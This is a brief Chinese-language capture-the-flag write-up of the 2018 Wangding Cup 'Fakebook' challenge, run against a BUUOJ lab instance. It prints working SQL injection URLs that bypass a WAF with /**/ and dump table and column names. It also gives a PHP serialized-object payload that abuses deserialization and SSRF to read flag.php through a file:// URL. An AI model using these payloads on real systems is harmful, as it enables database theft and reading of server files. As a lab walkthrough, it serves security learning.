25.[网鼎杯 2018]Fakebook

首先打开界面如下，有两个按钮login、join，试了下login登录不进去，

然后用join进入了

发现test为链接，随之点开，发现no参数，尝试注入。

说明存在注入的

order by 有4个字段

发现有waf，可以用/**/绕过

爆表名：爆出：users

http://43701ca6-b883-417f-b053-1ae3c48fbc60.node3.buuoj.cn/view.php?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

爆列名：爆出：no,username,passwd,data

http://43701ca6-b883-417f-b053-1ae3c48fbc60.node3.buuoj.cn/view.php?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name = 'users'

报字段：

data是我们注册时反序列化的数据

后面没思路，看了下wp，原来robots.txt源码

查看源码：

大概意思是前方暴露出flag.php路径，然后通过ssrf读取到flag。

payload：'O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

因为data在第四个字段，所以放到4输出

查看源码得到base64数据

解密得到flag